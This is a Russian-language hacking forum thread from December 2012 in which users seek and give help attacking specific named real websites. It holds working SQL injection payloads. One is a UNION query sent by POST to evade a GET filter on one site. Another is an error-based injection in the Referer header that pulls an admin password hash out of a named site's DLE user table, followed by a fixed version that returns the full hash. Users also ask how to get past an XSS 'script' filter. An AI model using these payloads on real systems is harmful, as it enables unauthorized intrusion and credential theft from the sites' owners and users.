 |
|
26.12.2012, 18:36
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от Vip77
Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/
Сообщение от darky
В этой и только в этой теме вы можете задать вопрос про
способ заливки шелла, детальные разборки xss и sql на конкретных сайтах...
Первый пост темы
Ключевое слово тут - детальной.
|
|
|
28.12.2012, 18:33
|
|
Новичок
Регистрация: 22.08.2011
Сообщений: 2
С нами:
7749686
Репутация:
0
|
|
Помогите раскрутить
http://tonnel.ru/?l=recept&recept=obich&idi=193'
И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается
|
|
|
|
28.12.2012, 20:29
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от zenon3
Помогите раскрутить
http://tonnel.ru/?l=recept&recept=obich&idi=193'
И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается
по первому вопросу:
запрос фильтруется по union, когда передаёшь гетом(возможно ещё что-то, но пофиг). Скрипт принимает пост так же как и гет, только не фильтрует данные (или же хост сам фильтрует только гет на юнионы и пр.).
Шлёшь на http://tonnel.ru/
l=recept&recept=obich&idi=-193' union select 1,(select table_name from information_schema.tables limit 1),3,4,5,6,7,8,9--
2. смотря как фильтруется, может и саму фильтрацию просто можно обойти.
|
|
|
|
29.12.2012, 03:22
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю:
Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
И вот че пишут: 63303161616237343161363064663039313866363861346434 303137623331
Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает.
Как вывести весь пароль?
|
|
|
|
29.12.2012, 03:28
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Vip77, можно использовать функцию RIGHT().
|
|
|
|
29.12.2012, 03:37
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Vip77
Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю:
Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
И вот че пишут: 63303161616237343161363064663039313866363861346434 303137623331
Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает.
Как вывести весь пароль?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]' and(select 1 from(select count(*),mid((select unhex(hex(cast(password as char))) from `slidem`.dle_users limit 0,1),rand(0)|0,64)x from information_schema.tables group by x)a) and '[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]'='[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
|
|
|
|
29.12.2012, 21:42
|
|
Новичок
Регистрация: 14.10.2012
Сообщений: 1
С нами:
7146326
Репутация:
0
|
|
Помогите раскрутить.
http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/*
По-моему, параметр page в коде просто приводится к целому числу и вставляется
...desc limit {$page}-12, 12....
Но я могу ошибаться.
|
|
|
|
29.12.2012, 23:30
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от singa
Помогите раскрутить.
http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/*
По-моему, параметр page в коде просто приводится к целому числу и вставляется
...desc limit {$page}-12, 12....
Но я могу ошибаться.
_ttp://www.guljan.info/news/2012/October/2707?page=-2
Сообщение от None
select a.* from articles as a where 1=1 AND ( (a.enable_publications_date = 1 AND a.from_publications_date 1356805614) OR a.enable_publications_date = 0 )and rubricator_id IN (1, 13, 7, 8, 10, 12, 16, 11, 25, 17, 24, 26, 23, 20, 22, 27, 19) and lang = 'ru' and a.flag_delete = '0'
order by
a.added desc, a.article_id desc
limit -36, 12
Вектор атаки невозможен по причине выделенной выше
|
|
|
|
30.12.2012, 22:34
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Помогите раскрутить:
Код:
_ttp://w ww.knightarmco.com/shop/ index.php?keyword=5&main_page=advanced_search_result&search_in_description=1
параметр keyword уязвим... чёт у меня ничего не получается... |
|
|
|
31.12.2012, 04:42
|
|
Познающий
Регистрация: 03.02.2009
Сообщений: 49
С нами:
9087772
Репутация:
403
|
|
Ребят есть активная XSS. Имеется фильтр на слово script.
Нужно подгрузить свой js файл. Нужна альтернатива
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
